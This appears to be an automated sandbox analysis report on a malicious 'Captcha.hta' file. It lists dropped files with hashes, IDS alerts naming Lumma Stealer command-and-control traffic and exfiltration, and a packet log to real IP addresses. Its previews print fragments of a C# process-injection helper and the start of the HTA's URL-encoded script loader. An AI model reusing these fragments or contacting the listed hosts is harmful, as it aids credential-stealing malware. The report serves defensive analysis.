                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:@...e...........................................................
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Thu Dec 12 16:33:57 2024, 1st section name ".debug$S"
                                                  Category:dropped
                                                  Size (bytes):1332
                                                  Entropy (8bit):3.9877017828582675
                                                  Encrypted:false
                                                  SSDEEP:24:HbFzW9nuz5RHzwKTFpmfwI+ycuZhNQ53akSh5gPNnqS2d:wudRkKTzmo1ulQJa3hiqSG
                                                  MD5:A04510705C70E41B85E8707259D22978
                                                  SHA1:53C9C6C64ADF16F7F6746A38171F5910B72CE340
                                                  SHA-256:99D4ED5111D812115E5CC80CAB3E188623A9DEE1C9A4632FE27C22E044CA9CC7
                                                  SHA-512:CF72CA3D17D7D15E25ADE4EFB4234F3E378285B0841DE2128BB5C1D1CDCC7E50C12C61E4620AF5CE8FA7CADFD4AEB29254F0FF621A305553979C159024B5246F
                                                  Malicious:false
                                                  Preview:L...u.[g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP................am...A..8...RZZ...........5.......C:\Users\user\AppData\Local\Temp\RESEA2B.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.0923813913827636
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq53ak7Ynqqh5gPN5Dlq5J:+RI+ycuZhNQ53akSh5gPNnqX
                                                  MD5:616D9199934189AA38DFE5F1525A5AAE
                                                  SHA1:CF2F59A62F6DDC074095C53A674D6CA81AE73CD6
                                                  SHA-256:EAD136EBFECA19255D10BEF51B621F3C1CAC389F5E782BBD94501797A83AC57A
                                                  SHA-512:C3D9C61437EC2CD629F829923128E0358580F02D05FA9C815B73DF48B70218238B405886F3F6A7E4EB3F16139B1F1E449F9FBA057CB5AFB4F813AEF0551F7676
                                                  Malicious:false
                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.q.v.y.0.d.a.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):10583
                                                  Entropy (8bit):4.487855797297623
                                                  Encrypted:false
                                                  SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                  MD5:B022C6FE4494666C8337A975D175C726
                                                  SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                  SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                  SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                  Malicious:true
                                                  Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):206
                                                  Entropy (8bit):5.001760545035336
                                                  Encrypted:false
                                                  SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRONtkE2J5xAIIWLaiQCIFRVRMxTPIONtkE2J5xAE:pAu+H2L/6K2CN23fEzxszICN23fB
                                                  MD5:9BE635EFB7EF2D7CB6CA5BF9DA3B960E
                                                  SHA1:E4CF964008A26C14E8C0D99F1A0B24E9DCD51826
                                                  SHA-256:39E0F3B48FD1E047D99D28C913A423C04C0FCE37C6F761A4C9058A2D82B07094
                                                  SHA-512:B897E5F1518F875A15187D8EFD9DB799ED1770CB606287F61C28E8D382F73246D1266B8DFAC3AF23884ADE9489B1071107EF808F8070BB99F750E09C5C1E6011
                                                  Malicious:true
                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs"
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8704
                                                  Entropy (8bit):4.662098784476934
                                                  Encrypted:false
                                                  SSDEEP:96:gbuaQZGQf9xPQ2pCa/u67hHJu9IhbpPrjzKcaEZRGH0ljILHqrv5MqnTzeNc+iqK:gCaQHf9WDa/u6TRj2cadUxd5Mq/eNcz
                                                  MD5:E6C0EBA4F3EEB7A507079730DD6DF636
                                                  SHA1:E5B9D4EE9E6DB974A70E0DBAE666F5C0A3D72935
                                                  SHA-256:08A6078B835AC7D9156B7176B86EEDF216746D90533C7069B956B32EAB740A3F
                                                  SHA-512:FEC0773D75A301E86C4964E52C4F647255E223A1C059ADB2C2BA46F87823E6253E2C447DCFFA63971C0A1D5F411C42AD0515CF97A693C206C7D44D6314D76FC9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.[g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                  Category:modified
                                                  Size (bytes):705
                                                  Entropy (8bit):5.248993446059102
                                                  Encrypted:false
                                                  SSDEEP:12:Kg/qR37L/6Km8NcKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KSqdn6KmocKax5DqBVKVrdFAMBJTH
                                                  MD5:2262C9232CE968909A071AB0EF52CA6D
                                                  SHA1:1EB2B378D13568A4AFB3FFD957921D046687B507
                                                  SHA-256:3CFBFFB8E27D9559D151C360FBB75C24892C2A71518BC8D0E0F45C31EC50651C
                                                  SHA-512:201301A3363411D09B9752B0A3CCB7A649FB4AD0FCFA04886B30B4294DDE081AFEBB2152BC0FDFF6930126D5C571E016D51A4ABDB9315E763A3B16DA99667AE3
                                                  Malicious:false
                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                  Process:C:\Windows\SysWOW64\curl.exe
                                                  File Type:ASCII text, with CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):320
                                                  Entropy (8bit):3.3711747259066978
                                                  Encrypted:false
                                                  SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgc21IXKn:Vz6ykymUexb1U9c56
                                                  MD5:3E2B4564E95E46F793C0F59F05D6B27B
                                                  SHA1:180C637D591BD5C5CE59D0C82689C53BB9D71584
                                                  SHA-256:CB13041742D63BDE44881A653839F098226F1973F469253A78A2F7A612BCBE49
                                                  SHA-512:E7D09883F06E54D97D6FA2B3D716A371174157BAA8B6237B3A27AEAB3240C81239E317DC8E0E847B95D8E69CE094B919D7958283B726B9DC47A8E92EBF36CEDE
                                                  Malicious:false
                                                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 4062 100 4062 0 0 4062 0 0:00:01 --:--:-- 0:00:01 9295..
                                                  File type:HTML document, ASCII text, with very long lines (2054), with CRLF line terminators
                                                  Entropy (8bit):3.4714896811582254
                                                  TrID:
                                                    File name:Captcha.hta
                                                    File size:2'097 bytes
                                                    MD5:a7045bcb116c3d85f1ff3706bec2b920
                                                    SHA1:4ff06af316d7e0453c948d358065d71301ea204a
                                                    SHA256:8abf12e3a919213c8ff825c1cc1df070990156d829bd5c55d6ce2f6974d77272
                                                    SHA512:81be5feffa1fec60145eaf21f4918a69dceb346d818560c38f9fc9ef0d972b6137b6778c3134a5a3d8e03bab1790fa1193c2ccffbd6beaf2388a1a12a9d4c4c0
                                                    SSDEEP:24:q0d+2xhZjaVKR581JlcwHHR/ubvp+l0Eze5RJehY63OrFRBb:qaX3Z/I3H90vgl85nCPwF7
                                                    TLSH:1D41A17C6621C88EAC337E7BECA87F60D254AF13EDC9A6C4081540863FE1469B5547DA
                                                    File Content Preview:<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%28%66%75%6E%63%74%69%6F
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-12T17:33:57.549674+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.11.2049710147.45.44.13180TCP
                                                    2024-12-12T17:33:57.550523+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass1147.45.44.13180192.168.11.2049710TCP
                                                    2024-12-12T17:33:59.162444+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049711172.67.207.38443TCP
                                                    2024-12-12T17:34:00.033272+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.11.2049711172.67.207.38443TCP
                                                    2024-12-12T17:34:00.033272+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049711172.67.207.38443TCP
                                                    2024-12-12T17:34:00.352278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049712172.67.207.38443TCP
                                                    2024-12-12T17:34:00.936925+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.11.2049712172.67.207.38443TCP
                                                    2024-12-12T17:34:00.936925+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049712172.67.207.38443TCP
                                                    2024-12-12T17:34:01.198117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049713172.67.207.38443TCP
                                                    2024-12-12T17:34:02.050943+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049714172.67.207.38443TCP
                                                    2024-12-12T17:34:02.947656+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.11.2049714172.67.207.38443TCP
                                                    2024-12-12T17:34:03.244896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049715172.67.207.38443TCP
                                                    2024-12-12T17:34:04.255802+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049716172.67.207.38443TCP
                                                    2024-12-12T17:34:05.548951+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049717172.67.207.38443TCP
                                                    2024-12-12T17:34:08.579973+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049718172.67.207.38443TCP
                                                    2024-12-12T17:34:09.472822+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049718172.67.207.38443TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 12, 2024 17:33:55.366131067 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:55.586704016 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.587172985 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:55.587621927 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:55.807702065 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.809194088 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.809232950 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.809247017 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.809257984 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:55.809423923 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:55.823656082 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.044431925 CET8049709147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.044634104 CET4970980192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.418873072 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.637157917 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.637301922 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.637471914 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.854470968 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.856739044 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.856750011 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.856946945 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857002020 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857012033 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857022047 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857029915 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.857042074 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857053041 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857063055 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857072115 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:56.857204914 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.857204914 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.857204914 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:56.857254028 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.074033976 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074049950 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074063063 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074074030 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074413061 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074645042 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074660063 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074685097 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074868917 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.074884892 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.074913025 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074924946 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074934959 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.074944973 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075079918 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075257063 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.075257063 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.075297117 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075309038 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075319052 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075505972 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075519085 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075529099 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075570107 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.075575113 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.075747967 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.075747967 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.291964054 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.291975021 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.292150021 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.292171955 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.292197943 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.292206049 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.292212963 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.292341948 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.292510986 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.329849005 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.549443007 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.549458027 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.549674034 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.549707890 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.549745083 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.549756050 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550019979 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550050974 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550076962 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550095081 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550112963 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550132036 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550148964 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550168037 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550234079 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550234079 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550241947 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550244093 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550245047 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550263882 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550277948 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550326109 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550379992 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550399065 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550416946 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550435066 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550452948 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550470114 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550488949 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550498962 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550498962 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550523043 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550540924 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550559044 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550578117 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550667048 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550671101 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550683975 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550693989 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550704002 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550714016 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.550944090 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550944090 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550944090 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550944090 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550944090 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.550997019 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551022053 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551039934 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551058054 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551075935 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551093102 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551104069 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551112890 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551122904 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551176071 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.551176071 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.551386118 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.551397085 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551398993 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551399946 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551399946 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551399946 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.551611900 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.551611900 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.551774025 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.767293930 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767311096 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767324924 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767335892 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767585039 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767589092 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.767606020 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767616034 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767626047 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767792940 CET4971080192.168.11.20147.45.44.131
                                                    Dec 12, 2024 17:33:57.767823935 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767836094 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767844915 CET8049710147.45.44.131192.168.11.20
                                                    Dec 12, 2024 17:33:57.767854929 CET8049710147.45.44.131192.168.11.20
